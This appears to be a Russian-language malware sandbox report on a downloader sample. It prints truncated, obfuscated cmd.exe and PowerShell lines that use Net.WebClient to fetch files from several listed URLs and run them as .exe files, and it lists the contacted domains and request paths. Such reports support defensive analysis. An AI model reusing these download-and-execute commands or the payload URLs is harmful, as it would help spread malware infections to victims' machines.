Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:/C"set vw=;'jrj'=UAw$}}{hctac}};kaerb;'zrw'=qsZ$;ABr$ metI-ekovnI{ )00008 eg- htgnel.)ABr$ metI-teG(( fI;'EwN'=iWU$;)ABr$ ,pdM$(eliFdaolnwoD.BSi${yrt{)YSf$ ni pdM$(hcaerof;'exe.'+lOX$+'\'+pm...
Сетевая активность
Подключается к
- 'ra#####icionline.com':80
- 'ra#####icionline.com':443
- 're####tionpress.com':80
- 're####tionpress.com':443
- 'tc###nnes.fr':80
- 'sy####ystems.com':80
TCP
Запросы HTTP GET
- http://ra#####icionline.com/GWBhWrqx0
- http://re####tionpress.com/mm7GGS7ie
- http://tc###nnes.fr/n7KoD5DB5W
- http://sy####ystems.com/PL9qSNRM6
- http://ww##.##mbisystems.com/PL9qSNRM6
Другие
- 'ra#####icionline.com':443
- 're####tionpress.com':443
UDP
- DNS ASK ra#####icionline.com
- DNS ASK re####tionpress.com
- DNS ASK tc###nnes.fr
- DNS ASK se###sites.es
- DNS ASK sy####ystems.com
- DNS ASK ww##.##mbisystems.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set vw=;'jrj'=UAw$}}{hctac}};kaerb;'zrw'=qsZ$;ABr$ metI-ekovnI{ )00008 eg- htgnel.)ABr$ metI-teG(( fI;'EwN'=iWU$;)ABr$ ,pdM$(eliFdaolnwoD.BSi${yrt{)YSf$ ni pdM$(hcaerof;'exe.'+lOX$+'\'+pm...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $wrN='Lfc';$iSB=new-object Net.WebClient;$fSY='http://ra#####icionline.com/GWBhWrqx0@http://reflectionpress.com/mm7GGS7ie@http://tccrennes.fr/n7KoD5DB5W@http://sevensi...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =Lfc
